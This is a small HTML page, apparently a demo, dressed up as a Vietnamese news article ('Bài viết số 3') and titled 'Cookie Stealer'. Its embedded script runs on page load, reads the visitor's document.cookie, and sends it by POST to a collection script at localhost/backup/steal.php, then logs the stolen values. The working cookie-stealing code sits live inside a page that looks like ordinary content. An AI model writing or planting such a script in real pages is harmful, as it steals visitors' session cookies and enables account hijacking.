<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Article 3 - Cookie Stealer</title>
</head>
<body>
  <h1>Bài viết số 3</h1>
  <p>Trang BÁO BÁO BÁO</p>
  <p>Đang đọc thì tn thg bạn nó bảo t lấy cookie m rồi .....</p>

  <script>
    window.addEventListener('load', function() {
      const stolenCookies = document.cookie;

      fetch('http://localhost/backup/steal.php', {
        method: 'POST',
        body: JSON.stringify({ cookies: stolenCookies })
      });

      console.log('Cookies đã gửi đi:', stolenCookies);
    });
  </script>
</body>
</html>
